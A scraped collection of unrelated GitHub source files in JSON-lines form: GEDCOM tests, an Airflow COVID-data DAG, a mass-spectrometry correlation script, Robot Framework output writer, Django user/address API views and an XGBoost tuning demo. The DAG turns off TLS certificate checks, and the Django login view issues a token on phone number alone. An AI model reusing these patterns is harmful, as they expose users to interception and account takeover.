than twice as old as the younger spouse\r\n    def test_US34_list_large_age_differences(self):\r\n        self.assertEqual(len(G1.listLargeAgeDifferences()), 4)\r\n        ageDifferences = []\r\n        for birt in ageDifferences:\r\n            self.assertIn(birt, G1.listLargeAgeDifferences())\r\n\r\n    #List all people in a GEDCOM file who were born in the last 30 days\r\n    def test_US35_list_recent_births(self):\r\n\r\n        self.assertEqual(len(G1.listRecentBirths()), 5)\r\n        self.assertNotEqual(len(G1.listRecentBirths()), 3)\r\n        bornPeople = []\r\n        for indi in bornPeople:\r\n            self.assertIn(indi, G1.listRecentBirths())\r\n\r\nif __name__ == '__main__':\r\n    unittest.main()\r\n    pass\r\n","repo_name":"IncapableFury/Final_Project_SW555","sub_path":"sprint_3_testing/yt_testing.py","file_name":"yt_testing.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"37331193716","text":"def fibonacci(n):\n    result = []\n    a = 1\n    b = 1\n\n    while len(result) < n:\n        result.append(a)\n        c = a + b\n        a = b\n        b = c\n    return result\n\n\ndef main():\n    print(fibonacci(10))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"presian/HackBulgaria","sub_path":"Programming101-3/Week_1/Warmups/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"20761963771","text":"from airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nimport datetime\n\nimport requests\nimport csv\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\ndefault_args = {\n    'owner': 'Yuliya Pak',\n    'start_date': datetime.datetime(2020, 6, 6)\n}\n\ndag = DAG(\n    'get_covid_data_russia',\n    catchup=False,\n    schedule_interval='0 12 * * *',\n    default_args=default_args\n)\n\n\ndef get_covid_data_russia():\n    russia_covid_data = []\n    list_of_covid_data = ['10', '9', '8']\n    for covid_data in list_of_covid_data:\n        response = requests.get(\n            f\"https://yastat.net/s3/milab/2020/covid19-stat/data/data_struct_{covid_data}.json\",\n            verify=False,\n        )\n        response.raise_for_status()\n        all_russia_covid_data = response.json()['russia_stat_struct']\n        dates = all_russia_covid_data['dates']\n        regions_data = all_russia_covid_data['data']\n        for region in regions_data:\n            region_name = regions_data[region]['info']['name']\n            region_cases = regions_data[region]['cases']\n            region_deaths = regions_data[region]['deaths']\n            region_cured = regions_data[region]['cured']\n            res = list(zip(dates, region_cases, region_deaths, region_cured))\n            for i in res:\n                row = {\n                    'date': i[0],\n                    'region': region_name,\n                    'infected': i[1]['v'],\n                    'recovered': i[3]['v'],\n                    'dead': i[2]['v']\n                }\n                russia_covid_data.append(row)\n\n    with open('russia_covid.csv', 'w', encoding='utf-8') as f:\n        fields = ['date', 'region', 'infected', 'recovered', 'dead']\n        write = csv.DictWriter(f, fields, delimiter=';')\n        write.writeheader()\n        for ln in russia_covid_data:\n            write.writerow(ln)\n\n\nget_covid_data = PythonOperator(\n    task_id='get_covid_data_russia_task',\n    dag=dag,\n    python_callable=get_covid_data_russia,\n)\n","repo_name":"piyuliya/LearnAirflow","sub_path":"dags/covid/dag_covid.py","file_name":"dag_covid.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"8121677896","text":"# -*- coding: utf-8 -*-\nimport re\nimport AminoAcidMass as config\n
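# AminoAcidMass (aliased as config) supplies the residue mass table mass_AA, the mass_H2O/mass_H constants and the pearSim correlation helper used below\n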
import time\nimport numpy as np\n\nstart = time.time()\n\n# File with the peptide information shared by MQ (MaxQuant) and pFind3\nSamePeptideFile = 'D:/SoftwareEvaluationNew/2016Eric_NC_Try_Mouse/2016Eric_NC_Try_Mouse.txt'\n# Target MGF file to match against\nTargetMGF = 'D:/SoftwareEvaluationNew/2016Eric_NC_Try_Mouse/TargetMGF.mgf'\n# PCC results for b and y ions matched separately, and for b/y ions matched together\nb_ion_PCC, y_ion_PCC, by_ion_PCC = {}, {}, {}\nresultbPCC, resultyPCC, resultbyPCC = [], [], []\n# Title list generated in the peptide order of SamePeptideFile\ntitleList = {}\n# Build a title list in result order\nwith open(SamePeptideFile, 'r') as f:\n\tfor line in f:\n\t\tif line == '':break\n\t\tif 'peptide\tmodification' in line:continue\n\t\ttitle = re.split('\\t|\\n',line)[3]\n\t\tres_seq = re.split('\\t|\\n',line)[0]\n\t\tres_charge = re.split('\\t|\\n',line)[2]\n\t\tif len(res_seq) <= 30 and len(res_seq) >= 7:\n\t\t\tif int(res_charge) >= 1 and int(res_charge) <= 6:\n\t\t\t\tmods = re.split('\\t|\\n',line)[1]\n\t\t\t\tif mods:\n\t\t\t\t\tres_seq = [i for i in res_seq]\n\t\t\t\t\tmods = mods.split(';')[:-1]\n\t\t\t\t\tfor m in mods:\n\t\t\t\t\t\tpos = int(m.split(',')[0])\n\t\t\t\t\t\tif m.split(',')[1] == 'Oxidation[M]':\n\t\t\t\t\t\t\tres_seq[pos - 1] = 'Mmod'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tres_seq[pos - 1] = 'Cmod'\n\t\t\t\t\t# res_seq = ''.join(res_seq)\n\t\t\t\ttitleList[title] = res_seq\nprint(len(titleList))\n\n# Get the spectrum titles in the MGF file and the corresponding m/z-intensity pairs\nwith open(TargetMGF, 'r') as f:\n\twhile True:\n\t\tline = f.readline()\n\t\tif line == '':break\n\t\tif 'TITLE=' in line:\n\t\t\tmgf_title = re.split('=|\\n',line)[1]\n\t\t\tif mgf_title in titleList.keys():\n\t\t\t\tmgf_seq = titleList[mgf_title]\n\t\t\t\tline = f.readline()\n\t\t\t\tline = f.readline()\n\t\t\t\tmgf_mz2inten = {}\n\t\t\t\tintenList = []\n\t\t\t\twhile 'END IONS' not in line:\n\t\t\t\t\tmz = float(re.split(' |\\n', line)[0])\n\t\t\t\t\tinten = float(re.split(' |\\n', line)[1])\n\t\t\t\t\tintenList.append(inten)\n\t\t\t\t\tmgf_mz2inten[mz] = inten\n\t\t\t\t\tline = f.readline()\n\t\t\t\tmax_inten = max(intenList)\n\t\t\t\tmgf_seq_mass = 0\n\t\t\t\tfor AA in mgf_seq:\n\t\t\t\t\tmgf_seq_mass += config.mass_AA[AA]\n\t\t\t\tmgf_seq_mass = mgf_seq_mass + config.mass_H2O\n\t\t\t\tpro_mass = 0\n\t\t\t\tmgf_b_inten,mgf_y_inten = [], []\n\t\t\t\tfor index, AA in enumerate(mgf_seq[:-1]):\n\t\t\t\t\tpro_mass = pro_mass + config.mass_AA[AA]\n\t\t\t\t\tisb, isy, isb2, isy2 = False, False, False, False\n\t\t\t\t\tfor mz in mgf_mz2inten.keys():\n\t\t\t\t\t\tif abs(pro_mass + config.mass_H - mz)/mz*(10**6) <= 20 and isb == False:\n\t\t\t\t\t\t\tmgf_b_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisb = True\n\t\t\t\t\t\tif abs(pro_mass/2 + config.mass_H - mz)/mz*(10**6) <= 20 and isb2 == False:\n\t\t\t\t\t\t\tmgf_b_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisb2 = True\n\t\t\t\t\t\tif abs(mgf_seq_mass - pro_mass + config.mass_H - mz)/mz*(10**6) <= 20 and isy == False:\n\t\t\t\t\t\t\tmgf_y_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisy = True\n\t\t\t\t\t\tif abs((mgf_seq_mass - pro_mass)/2 + config.mass_H - mz)/mz*(10**6) <= 20 and isy2 == False:\n\t\t\t\t\t\t\tmgf_y_inten.append(mgf_mz2inten[mz]/max_inten)\n\t\t\t\t\t\t\tisy2 = True\n\t\t\t\t\tif not isb:\n\t\t\t\t\t\tmgf_b_inten.append(0.0)\n\t\t\t\t\tif not isb2:\n\t\t\t\t\t\tmgf_b_inten.append(0.0)\n\t\t\t\t\tif not isy:\n\t\t\t\t\t\tmgf_y_inten.append(0.0)\n\t\t\t\t\tif not isy2:\n\t\t\t\t\t\tmgf_y_inten.append(0.0)\n\t\t\t\tmgf_by_inten = mgf_b_inten + mgf_y_inten[::-1]\n\t\t\t\tif ''.join(mgf_seq) in 
b_ion_PCC.keys():\n\t\t\t\t\tb_ion_PCC[''.join(mgf_seq)].append(mgf_b_inten)\n\t\t\t\t\ty_ion_PCC[''.join(mgf_seq)].append(mgf_y_inten)\n\t\t\t\t\tby_ion_PCC[''.join(mgf_seq)].append(mgf_by_inten)\n\t\t\t\telse:\n\t\t\t\t\tb_ion_PCC[''.join(mgf_seq)] = [mgf_b_inten]\n\t\t\t\t\ty_ion_PCC[''.join(mgf_seq)] = [mgf_y_inten]\n\t\t\t\t\tby_ion_PCC[''.join(mgf_seq)] = [mgf_by_inten]\n\nfor seq in b_ion_PCC:\n\tif len(b_ion_PCC[seq]) > 1:\n\t\tmedintenb = []\n\t\tpeplenb = len(b_ion_PCC[seq][0])\n\t\tpepnumb = len(b_ion_PCC[seq])\n\t\tfor i in range(peplenb):\n\t\t\ttemp = []\n\t\t\tfor j in b_ion_PCC[seq]:\n\t\t\t\ttemp.append(j[i])\n\t\t\ttemp = sorted(temp)\n\t\t\tif pepnumb % 2 == 0:\n\t\t\t\tmedintenb.append((temp[int(pepnumb/2) - 1] + temp[int(pepnumb/2)])/2)\n\t\t\telse:\n\t\t\t\tmedintenb.append(temp[pepnumb//2])\n\t\ttempPCC = []\n\t\tfor v in b_ion_PCC[seq]:\n\t\t\tpearb = config.pearSim(medintenb, v)\n\t\t\ttempPCC.append(pearb)\n\t\ttempPCC = sorted(tempPCC)\n\t\tif len(tempPCC) % 2 == 0:\n\t\t\tresultbPCC.append((tempPCC[int(len(tempPCC)/2) - 1] + tempPCC[int(len(tempPCC)/2)])/2)\n\t\telse:\n\t\t\tresultbPCC.append(tempPCC[len(tempPCC)//2])\n\n\tif len(y_ion_PCC[seq]) > 1:\n\t\tmedinteny = []\n\t\tpepleny = len(y_ion_PCC[seq][0])\n\t\tpepnumy = len(y_ion_PCC[seq])\n\t\tfor i in range(pepleny):\n\t\t\ttemp = []\n\t\t\tfor j in y_ion_PCC[seq]:\n\t\t\t\ttemp.append(j[i])\n\t\t\ttemp = sorted(temp)\n\t\t\tif pepnumy % 2 == 0:\n\t\t\t\tmedinteny.append((temp[int(pepnumy/2) - 1] + temp[int(pepnumy/2)])/2)\n\t\t\telse:\n\t\t\t\tmedinteny.append(temp[pepnumy//2])\n\t\ttempPCC = []\n\t\tfor v in y_ion_PCC[seq]:\n\t\t\tpeary = config.pearSim(medinteny, v)\n\t\t\ttempPCC.append(peary)\n\t\ttempPCC = sorted(tempPCC)\n\t\tif len(tempPCC) % 2 == 0:\n\t\t\tresultyPCC.append((tempPCC[int(len(tempPCC)/2) - 1] + tempPCC[int(len(tempPCC)/2)])/2)\n\t\telse:\n\t\t\tresultyPCC.append(tempPCC[len(tempPCC)//2])\n\n\tif len(by_ion_PCC[seq]) > 1:\n\t\t\tmedintenby = []\n\t\t\tpeplenby = len(by_ion_PCC[seq][0])\n\t\t\tpepnumby = len(by_ion_PCC[seq])\n\t\t\tfor i in range(peplenby):\n\t\t\t\ttemp = []\n\t\t\t\tfor j in by_ion_PCC[seq]:\n\t\t\t\t\ttemp.append(j[i])\n\t\t\t\ttemp = sorted(temp)\n\t\t\t\tif pepnumby % 2 == 0:\n\t\t\t\t\tmedintenby.append((temp[int(pepnumby/2) - 1] + temp[int(pepnumby/2)])/2)\n\t\t\t\telse:\n\t\t\t\t\tmedintenby.append(temp[pepnumby//2])\n\t\t\ttempPCC = []\n\t\t\tfor v in by_ion_PCC[seq]:\n\t\t\t\tpearby = config.pearSim(medintenby, v)\n\t\t\t\ttempPCC.append(pearby)\n\t\t\ttempPCC = sorted(tempPCC)\n\t\t\tif len(tempPCC) % 2 == 0:\n\t\t\t\tresultbyPCC.append((tempPCC[int(len(tempPCC)/2) - 1] + tempPCC[int(len(tempPCC)/2)])/2)\n\t\t\telse:\n\t\t\t\tresultbyPCC.append(tempPCC[len(tempPCC)//2])\n\nall_b_pears = sorted(resultbPCC)\nall_y_pears = sorted(resultyPCC)\nall_pears = sorted(resultbyPCC)\n\nlenB = len(all_b_pears)\nlenY = len(all_y_pears)\nlenall = len(all_pears)\n# print(str(lenB) + '|' + str(lenY) + '|' + str(lenall))\nif lenB % 2 == 0:\n\tmedian_b_pears = (all_b_pears[int(lenB/2) - 1] + all_b_pears[int(lenB/2)])/2\n\tmedian_y_pears = (all_y_pears[int(lenY/2) - 1] + all_y_pears[int(lenY/2)])/2\nelse:\n\tmedian_b_pears = all_b_pears[lenB//2]\n\tmedian_y_pears = all_y_pears[lenY//2]\nif lenall % 2 == 0:\n\tmedian_pears = (all_pears[int(lenall/2) - 1] + all_pears[int(lenall/2)])/2\nelse:\n\tmedian_pears = all_pears[lenall//2]\n\nprint('='*30)\nprint('PXD005590' + '-result :')\t#SamePeptideFile.split('.')[0]\nprint('by ions total number: %s'%(lenall))\nprint('Median PCCs of BY 
ions: %s'%median_pears)\nprint('Median PCCs of B ions: %s'%median_b_pears)\nprint('Median PCCs of Y ions: %s'%median_y_pears)\n\nendtime = time.time() - start\nprint(endtime)\n","repo_name":"PHOENIXcenter/MS2SpectraPredictionEvaluation","sub_path":"baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":6638,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"13515251722","text":"from robot.htmldata import JsonWriter\n\n\nclass JsResultWriter:\n    _output_attr = 'window.output'\n    _settings_attr = 'window.settings'\n    _suite_key = 'suite'\n    _strings_key = 'strings'\n\n    def __init__(self, output,\n                 start_block='\\n',\n                 end_block='\\n',\n                 split_threshold=9500):\n        writer = JsonWriter(output, separator=end_block+start_block)\n        self._write = writer.write\n        self._write_json = writer.write_json\n        self._start_block = start_block\n        self._end_block = end_block\n        self._split_threshold = split_threshold\n\n    def write(self, result, settings):\n        self._start_output_block()\n        self._write_suite(result.suite)\n        self._write_strings(result.strings)\n        self._write_data(result.data)\n        self._write_settings_and_end_output_block(settings)\n\n    def _start_output_block(self):\n        self._write(self._start_block, postfix='', separator=False)\n        self._write('%s = {}' % self._output_attr)\n\n    def _write_suite(self, suite):\n        writer = SuiteWriter(self._write_json, self._split_threshold)\n        writer.write(suite, self._output_var(self._suite_key))\n\n    def _write_strings(self, strings):\n        variable = self._output_var(self._strings_key)\n        self._write('%s = []' % variable)\n        prefix = '%s = %s.concat(' % (variable, variable)\n        postfix = ');\\n'\n        threshold = self._split_threshold\n        for index in range(0, len(strings), threshold):\n            self._write_json(prefix, strings[index:index+threshold], postfix)\n\n    def _write_data(self, data):\n        for key in data:\n            self._write_json('%s = ' % self._output_var(key), data[key])\n\n    def _write_settings_and_end_output_block(self, settings):\n        self._write_json('%s = ' % self._settings_attr, settings,\n                         separator=False)\n        self._write(self._end_block, postfix='', separator=False)\n\n    def _output_var(self, key):\n        return '%s[\"%s\"]' % (self._output_attr, key)\n\n\nclass SuiteWriter:\n\n    def __init__(self, write_json, split_threshold):\n        self._write_json = write_json\n        self._split_threshold = split_threshold\n\n    def write(self, suite, variable):\n        mapping = {}\n        self._write_parts_over_threshold(suite, mapping)\n        self._write_json('%s = ' % variable, suite, mapping=mapping)\n\n    def _write_parts_over_threshold(self, data, mapping):\n        if not isinstance(data, tuple):\n            return 1\n        not_written = 1 + sum(self._write_parts_over_threshold(item, mapping)\n                              for item in data)\n        if not_written > self._split_threshold:\n            self._write_part(data, mapping)\n            return 1\n        return not_written\n\n    def _write_part(self, data, mapping):\n        part_name = 'window.sPart%d' % len(mapping)\n        self._write_json('%s = ' % part_name, data, mapping=mapping)\n        mapping[data] = part_name\n\n\nclass SplitLogWriter:\n\n    def __init__(self, output):\n        self._writer = JsonWriter(output)\n\n    def write(self, keywords, strings, index, notify):\n        self._writer.write_json('window.keywords%d = ' % index, keywords)\n        self._writer.write_json('window.strings%d = ' % index, strings)\n        self._writer.write('window.fileLoading.notify(\"%s\")' % 
notify)\n","repo_name":"robotframework/robotframework","sub_path":"src/robot/reporting/jswriter.py","file_name":"jswriter.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","stars":8521,"dataset":"github-code","pt":"21"} +{"seq_id":"11905620203","text":"import binascii\nimport os\nimport jdatetime\nfrom django.contrib.auth import get_user_model\nfrom rest_framework import status, generics\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom userapp.api.serializers import *\nfrom userapp.models import *\nfrom userapp.api.permissions import *\nfrom rest_framework.authtoken.models import Token\n\n\ndef _generate_pass():\n return binascii.hexlify(os.urandom(20))\n\n\nclass Signup(APIView):\n permission_classes = (AllowAny,)\n serializer_class = SignupSerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n print(request.data)\n if serializer.is_valid():\n phone = serializer.validated_data['phone']\n check_sms_or_call = False\n must_validate_sms = getattr(settings, \"AUTH_SMS_VERIFICATION\", True)\n\n try:\n user = get_user_model().objects.get(phone=phone)\n signup_sms_code = VerifyCode.objects.filter(user=user).last()\n if signup_sms_code is not None:\n now = jdatetime.datetime.now()\n\n # for i in signup_sms_code:\n c = signup_sms_code.created_at\n\n sub = (now-c).total_seconds()\n if sub < 0:\n sub = sub * -1\n if sub <= 120:\n content = {\n 'code': 2,\n 'status': 'no',\n 'detail': '2 mins ago you have a sms'\n }\n return Response(content, status=status.HTTP_200_OK)\n signup_sms_code.delete()\n\n except VerifyCode.DoesNotExist:\n pass\n\n except get_user_model().DoesNotExist:\n try:\n user = get_user_model().objects.create_user(username=phone, phone=phone)\n user.is_active = False\n check_sms_or_call = True\n except:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n # Set user fields provided\n # if not user.is_active:\n # password = _generate_pass()\n # user.set_password(password)\n\n user.save()\n if must_validate_sms:\n # Create and associate signup code\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR', '0.0.0.0')\n if x_forwarded_for:\n ipaddr = x_forwarded_for.split(',')[0]\n else:\n ipaddr = request.META.get('REMOTE_ADDR', '0.0.0.0')\n\n signup_sms_code = VerifyCode.objects.create_sms_code(user=user, ipaddr=ipaddr)\n check_status = signup_sms_code.send_signup_sms()\n # TODO : check this status after get code\n if not check_status:\n print(\"check status in sms error phone is : \", user.phone)\n content = {'code': 1,\n 'status': 'no'\n }\n else:\n content = {'code': 0,\n 'status': 'ok'\n }\n return Response(content, status=status.HTTP_201_CREATED)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n############################\n############################\n\n\nclass Verify(APIView):\n permission_classes = (AllowAny,)\n serializer_class = VerifySerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n verified = False\n code = serializer.validated_data['code']\n phone = serializer.validated_data['phone']\n try:\n user = get_user_model().objects.get(phone=phone)\n except get_user_model().DoesNotExist:\n content = {'code': 1, 'status': 'no', 'detail': 'user does not exist.'}\n 
return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n try:\n verified = VerifyCode.objects.set_user_is_verified(code=code, user=user)\n except VerifyCode.DoesNotExist:\n content = {'code': 2, 'status': 'no', 'detail': 'code does not exist.'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n\n if verified:\n content = {'code': 0, 'status': 'ok', 'detail': 'User verified.'}\n return Response(content, status=status.HTTP_200_OK)\n else:\n content = {'code': 3, 'status': 'no', 'detail': 'Unable to verify user.'}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n############################\n############################\n\n\nclass Login(APIView):\n permission_classes = (AllowAny,)\n serializer_class = LoginSerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n phone = serializer.validated_data['phone']\n try:\n user = get_user_model().objects.get(phone=phone)\n if user.is_active:\n token, created = Token.objects.get_or_create(user=user)\n return Response({'code': 0, 'id': user.id, 'token': token.key, 'fname': user.first_name,\n 'lname': user.last_name, 'email': user.email},\n status=status.HTTP_200_OK)\n else:\n content = {'code': 2, 'detail': 'Unable to login with provided credentials.'}\n return Response(content, status=status.HTTP_202_ACCEPTED)\n except get_user_model().DoesNotExist:\n return Response({'code': 3, 'detail': 'user does not exist.'}, status=status.HTTP_202_ACCEPTED)\n\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n############################\n############################\n\n\nclass UserUpdate(APIView):\n # permission_classes = IsClient\n authentication_classes = (TokenAuthentication,)\n serializer_class = UserUpdateSerializer\n\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n\n if serializer.is_valid():\n user = request.user\n if user.is_anonymous:\n content = {'code': 1, 'detail': 'User is anonymous in user update'}\n return Response(content, status=status.HTTP_401_UNAUTHORIZED)\n\n first_name = serializer.validated_data.get('first_name', '')\n last_name = serializer.validated_data.get('last_name', '')\n email = serializer.validated_data.get('email', '')\n temp = 0\n\n if first_name != '':\n user.first_name = first_name\n temp = 1\n\n if last_name != '':\n user.last_name = last_name\n temp = 1\n\n if email != '':\n user.email = email\n temp = 1\n\n if temp == 1:\n user.save()\n\n content = {'code': 0, 'first_name': user.first_name,\n 'last_name': user.last_name, 'email': user.email}\n return Response(content, status=status.HTTP_200_OK,\n headers={'Access-Control-Allow-Origin': '*'})\n\n else:\n content = {'code': 2, 'detail': 'error in user update api'}\n return Response(content, status=status.HTTP_200_OK)\n\n############################\n############################\n\n\nclass AddressApiView(APIView):\n # permission_classes = (IsClient,)\n serializer_class = AddressSerializer\n authentication_classes = (TokenAuthentication,)\n\n def post(self, request, opt):\n serializer = self.serializer_class(data=request.data)\n # print(request.POST['id'])\n if serializer.is_valid():\n try:\n # print(serializer.data)\n user = request.user\n if user.is_anonymous:\n content = {'code': 1, 'detail': 'user is anonymous.'}\n return Response(content, status=status.HTTP_200_OK)\n if opt == 'delete':\n id = 
serializer.data.get('id', '')\n if id:\n try:\n add = Address.objects.get(id=id, user=user, status=1)\n add.status = 0\n add.save()\n content = {'code': 0, 'detail': 'Address deleted.'}\n return Response(content, status=status.HTTP_202_ACCEPTED)\n except Address.DoesNotExist:\n pass\n content = {'code': 3, 'detail': 'Address Does not exist in deleting address.'}\n return Response(content, status=status.HTTP_200_OK)\n elif opt == 'update':\n try:\n id = serializer.data.get('id', None)\n add = Address.objects.get(id=id)\n lat = serializer.data.get('lat', None)\n lng = serializer.data.get('lng', None)\n if lat is not None and lng is not None:\n lat = float(lat)\n lng = float(lng)\n location = {'type': 'Point', 'coordinates': [lng, lat]}\n else:\n location = add.location\n address = serializer.data.get('address', add.addr)\n phone = serializer.data.get('phone', add.phone)\n name = serializer.data.get('name', add.name)\n zipcode = serializer.data.get('zipcode', add.zip_code)\n add.addr = address\n add.name = name\n add.phone = phone\n add.zip_code = zipcode\n add.location = location\n add.save()\n content = {'id': add.id, 'name': add.name, 'lat': lat, 'lng': lng, 'address': add.addr,\n 'user': user.id, 'phone': add.phone, 'zip_code': add.zip_code}\n return Response(content, status=status.HTTP_202_ACCEPTED,\n headers={'Access-Control-Allow-Origin': '*'})\n except Address.DoesNotExist:\n content = {'code': 3, 'detail': 'address not exist in address update.'}\n return Response(content, status=status.HTTP_200_OK,\n headers={'Access-Control-Allow-Origin': '*'})\n else:\n try:\n lat = serializer.data.get('lat', None)\n lng = serializer.data.get('lng', None)\n if lat is not None and lng is not None:\n lat = float(lat)\n lng = float(lng)\n location = {'type': 'Point', 'coordinates': [lng, lat]}\n else:\n location = None\n address = serializer.data.get('address', '')\n phone = serializer.data.get('phone', None)\n name = serializer.data.get('name', None)\n zipcode = serializer.data.get('zipcode', None)\n add = Address.objects.create(user=user, phone=phone, zip_code=zipcode,\n location=location, addr=address, name=name)\n\n content = {'id': add.id, 'name': add.name, 'lat': lat, 'lng': lng, 'address': add.addr,\n 'user': user.id, 'phone': add.phone, 'zip_code': add.zip_code}\n return Response(content, status=status.HTTP_202_ACCEPTED,\n headers={'Access-Control-Allow-Origin': '*'})\n except:\n content = {'code': 2, 'detail': 'error occurred in address create.'}\n return Response(content, status=status.HTTP_200_OK)\n except:\n content = {'code': 2, 'detail': 'error occurred in address api view.'}\n return Response(content, status=status.HTTP_200_OK)\n\n return Response(serializer.errors, status=status.HTTP_200_OK)\n\n\nclass AddressListAPIView(generics.ListAPIView):\n authentication_classes = (TokenAuthentication,)\n serializer_class = AddressListSerializer\n permission_classes = (IsAuthenticated,)\n\n def get_queryset(self):\n try:\n user = self.request.user\n if user:\n addresses = Address.objects.filter(user=user)\n return addresses\n else:\n content = {'code': 0, 'detail': 'User Does not exist in List address.'}\n return Response(content, status=status.HTTP_200_OK)\n except:\n content = {'code': 1, 'detail': 'error in address list'}\n return Response(content, status=status.HTTP_200_OK)\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n serializer = self.get_serializer(queryset, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK,\n 
headers={'Access-Control-Allow-Origin': '*'})\n\n############################\n############################\n","repo_name":"Hojjatrt/KishvandMarket","sub_path":"userapp/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14037,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
{"seq_id":"18395406772","text":"import pandas as pd\r\nimport numpy as np\r\nimport xgboost as xgb\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nfrom sklearn.datasets import make_classification\r\n\r\n\r\n# X holds the sample features and y the class labels: 10000 samples, 20 features each, 2 classes, no redundant features, one cluster per class\r\nX, y = make_classification(n_samples=10000, n_features=20, n_redundant=0,\r\n                           n_clusters_per_class=1, n_classes=2, flip_y=0.1)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2)\r\n\r\n\r\nsklearn_model = xgb.XGBClassifier(learning_rate= 0.5, verbosity=1, objective='binary:logistic',random_state=1) #!! verbosity controls printed output\r\nsklearn_model=sklearn_model.set_params(early_stopping_rounds=10, eval_metric='error')\r\nsklearn_model.fit(X_train, y_train,eval_set=[(X_test, y_test)])\r\nprint('---'*10)\r\n\r\nsklearn_model_1 = xgb.XGBClassifier(learning_rate= 0.5, verbosity=1, objective='binary:logistic',random_state=1)\r\ngsCv = GridSearchCV(sklearn_model_1,\r\n                    {'max_depth':[3,4,5],\r\n                     'n_estimators':[5,10,20]})\r\ngsCv.fit(X_train,y_train)\r\n\r\nprint(gsCv.best_score_)\r\nprint(gsCv.best_params_)\r\n\r\nsklearn_model_2 = xgb.XGBClassifier(max_depth=4,n_estimators=5,verbosity=1, objective='binary:logistic',random_state=1)\r\ngsCv2 = GridSearchCV(sklearn_model_2, \r\n                     {'learning_rate': [0.3,0.5,0.7]})\r\ngsCv2.fit(X_train,y_train)\r\n\r\nprint(gsCv2.best_score_)\r\nprint(gsCv2.best_params_)\r\n\r\nsklearn_model_final = xgb.XGBClassifier(max_depth=4,learning_rate= 0.7, verbosity=1, objective='binary:logistic',n_estimators=10)\r\nsklearn_model_final.set_params(early_stopping_rounds=10, eval_metric=\"error\")\r\nsklearn_model_final.fit(X_train, y_train,eval_set=[(X_test, y_test)])\r\n\r\n","repo_name":"demonjack01/machine_learning","sub_path":"机器学习/刘建平/集成学习/XGBboost.py","file_name":"XGBboost.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"30569916376","text":"import hashlib\nimport importlib\nimport os\nimport re\nfrom collections import defaultdict\nfrom datetime import datetime, timezone\nfrom io import BytesIO\nfrom itertools import chain\nfrom operator import attrgetter\nfrom os.path import splitext\nfrom pathlib import Path\nfrom typing import (\n    Optional,\n    Any,\n    Type,\n    Set,\n    Dict,\n    Sequence,\n    Tuple,\n    BinaryIO,\n    Union,\n    Mapping,\n    IO,\n    Callable,\n)\nfrom urllib.parse import unquote, urlparse\nfrom uuid import uuid4, UUID, uuid5\nfrom zipfile import ZipFile, ZIP_BZIP2\n\nimport mongoengine\nfrom boltons.iterutils import chunked_iter, first\nfrom furl import furl\nfrom mongoengine import Q\n\nfrom apiserver.bll.event import EventBLL\nfrom apiserver.bll.event.event_common import EventType\nfrom apiserver.bll.project import project_ids_with_children\nfrom apiserver.bll.task.artifacts import get_artifact_id\nfrom apiserver.bll.task.param_utils import (\n    split_param_name,\n    hyperparams_default_section,\n    hyperparams_legacy_type,\n)\nfrom apiserver.config_repo import config\nfrom apiserver.config.info import get_default_company\nfrom 
